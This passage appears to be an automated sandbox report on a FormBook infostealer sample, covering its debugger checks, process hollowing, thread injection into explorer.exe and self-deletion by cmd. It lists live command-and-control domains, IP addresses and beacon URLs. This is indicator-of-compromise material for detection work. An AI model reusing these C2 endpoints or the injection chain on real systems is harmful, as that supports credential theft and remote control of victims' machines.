Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h] 7_2_03874D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387513A mov eax, dword ptr fs:[00000030h] 7_2_0387513A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387513A mov eax, dword ptr fs:[00000030h] 7_2_0387513A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386B944 mov eax, dword ptr fs:[00000030h] 7_2_0386B944
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386B944 mov eax, dword ptr fs:[00000030h] 7_2_0386B944
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03883D43 mov eax, dword ptr fs:[00000030h] 7_2_03883D43
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C3540 mov eax, dword ptr fs:[00000030h] 7_2_038C3540
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03867D50 mov eax, dword ptr fs:[00000030h] 7_2_03867D50
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384C962 mov eax, dword ptr fs:[00000030h] 7_2_0384C962
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386C577 mov eax, dword ptr fs:[00000030h] 7_2_0386C577
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386C577 mov eax, dword ptr fs:[00000030h] 7_2_0386C577
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384B171 mov eax, dword ptr fs:[00000030h] 7_2_0384B171
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384B171 mov eax, dword ptr fs:[00000030h] 7_2_0384B171
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849080 mov eax, dword ptr fs:[00000030h] 7_2_03849080
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C3884 mov eax, dword ptr fs:[00000030h] 7_2_038C3884
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C3884 mov eax, dword ptr fs:[00000030h] 7_2_038C3884
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385849B mov eax, dword ptr fs:[00000030h] 7_2_0385849B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038890AF mov eax, dword ptr fs:[00000030h] 7_2_038890AF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387F0BF mov ecx, dword ptr fs:[00000030h] 7_2_0387F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387F0BF mov eax, dword ptr fs:[00000030h] 7_2_0387F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387F0BF mov eax, dword ptr fs:[00000030h] 7_2_0387F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918CD6 mov eax, dword ptr fs:[00000030h] 7_2_03918CD6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov ecx, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_039014FB mov eax, dword ptr fs:[00000030h] 7_2_039014FB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h] 7_2_038C6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h] 7_2_038C6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h] 7_2_038C6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03914015 mov eax, dword ptr fs:[00000030h] 7_2_03914015
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03914015 mov eax, dword ptr fs:[00000030h] 7_2_03914015
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h] 7_2_038C6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h] 7_2_038C6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h] 7_2_038C6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h] 7_2_038C6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h] 7_2_038C7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h] 7_2_038C7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h] 7_2_038C7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391740D mov eax, dword ptr fs:[00000030h] 7_2_0391740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391740D mov eax, dword ptr fs:[00000030h] 7_2_0391740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391740D mov eax, dword ptr fs:[00000030h] 7_2_0391740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387002D mov eax, dword ptr fs:[00000030h] 7_2_0387002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387002D mov eax, dword ptr fs:[00000030h] 7_2_0387002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387002D mov eax, dword ptr fs:[00000030h] 7_2_0387002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387002D mov eax, dword ptr fs:[00000030h] 7_2_0387002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387002D mov eax, dword ptr fs:[00000030h] 7_2_0387002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387BC2C mov eax, dword ptr fs:[00000030h] 7_2_0387BC2C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h] 7_2_0385B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h] 7_2_0385B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h] 7_2_0385B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h] 7_2_0385B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A44B mov eax, dword ptr fs:[00000030h] 7_2_0387A44B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03860050 mov eax, dword ptr fs:[00000030h] 7_2_03860050
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03860050 mov eax, dword ptr fs:[00000030h] 7_2_03860050
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DC450 mov eax, dword ptr fs:[00000030h] 7_2_038DC450
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DC450 mov eax, dword ptr fs:[00000030h] 7_2_038DC450
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03902073 mov eax, dword ptr fs:[00000030h] 7_2_03902073
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03911074 mov eax, dword ptr fs:[00000030h] 7_2_03911074
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386746D mov eax, dword ptr fs:[00000030h] 7_2_0386746D
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\DN_467842234567.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00409B30 LdrLoadDll, 1_2_00409B30

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.kxdrstone.com
Source: C:\Windows\explorer.exe Domain query: www.financecreditpro.com
Source: C:\Windows\explorer.exe Domain query: www.2377k.com
Source: C:\Windows\explorer.exe Domain query: www.portale-accessi-anomali.com
Source: C:\Windows\explorer.exe Network Connect: 5.9.90.226 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.nurhalilah.xyz
Source: C:\Windows\explorer.exe Domain query: www.uscryptomininglaws.com
Source: C:\Windows\explorer.exe Domain query: www.healthcaresms.com
Source: C:\Windows\explorer.exe Network Connect: 104.21.11.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.drive16pay.art
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lottochain.bet
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.148.98 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.smpldebts.com
Source: C:\Windows\explorer.exe Network Connect: 202.165.66.108 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\DN_467842234567.exe Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 10D0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\DN_467842234567.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\DN_467842234567.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\DN_467842234567.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\DN_467842234567.exe Memory written: C:\Users\user\Desktop\DN_467842234567.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\DN_467842234567.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\DN_467842234567.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 3424 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\DN_467842234567.exe Process created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe' Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe' Jump to behavior
Source: explorer.exe, 00000004.00000000.677442024.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040312A

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491743 Sample: DN_467842234567.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 31 www.byemreperde.com 2->31 33 www.21lawsofconfidence.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 6 other signatures 2->47 11 DN_467842234567.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\rcgwzvp.dll, PE32 11->29 dropped 61 Detected unpacking (changes PE section rights) 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 15 DN_467842234567.exe 11->15         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.drive16pay.art 202.165.66.108, 49863, 80 VPIS-APVADSManagedBusinessInternetServiceProviderMY Australia 18->35 37 www.financecreditpro.com 5.9.90.226, 49839, 80 HETZNER-ASDE Germany 18->37 39 13 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 51 Performs DNS queries to domains with low reputation 18->51 22 WWAHost.exe 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.11.163
 www.nurhalilah.xyz United States
13335 CLOUDFLARENETUS true
35.246.6.109
 td-balancer-euw2-6-109.wixdns.net United States
15169 GOOGLEUS false
34.102.136.180
 uscryptomininglaws.com United States
15169 GOOGLEUS false
172.67.148.98
 www.2377k.com United States
13335 CLOUDFLARENETUS true
5.9.90.226
 www.financecreditpro.com Germany
24940 HETZNER-ASDE true
202.165.66.108
 www.drive16pay.art Australia
18206 VPIS-APVADSManagedBusinessInternetServiceProviderMY true

Contacted Domains

Name IP Active
www.drive16pay.art 202.165.66.108 true
uscryptomininglaws.com 34.102.136.180 true
www.financecreditpro.com 5.9.90.226 true
www.2377k.com 172.67.148.98 true
td-balancer-euw2-6-109.wixdns.net 35.246.6.109 true
www.nurhalilah.xyz 104.21.11.163 true
www.healthcaresms.com unknown unknown
www.kxdrstone.com unknown unknown
www.21lawsofconfidence.com unknown unknown
www.lottochain.bet unknown unknown
www.byemreperde.com unknown unknown
www.portale-accessi-anomali.com unknown unknown
www.uscryptomininglaws.com unknown unknown
www.smpldebts.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.drive16pay.art/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 true
  • Avira URL Cloud: safe
 unknown
http://www.2377k.com/r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 true
  • Avira URL Cloud: safe
 unknown
http://www.lottochain.bet/r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 false
  • Avira URL Cloud: safe
 unknown
www.bofight.store/r95e/ true
  • Avira URL Cloud: safe
 low
http://www.nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 true
  • Avira URL Cloud: safe
 unknown
http://www.financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 true
  • Avira URL Cloud: safe
 unknown
http://www.uscryptomininglaws.com/r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 false
  • Avira URL Cloud: safe
 unknown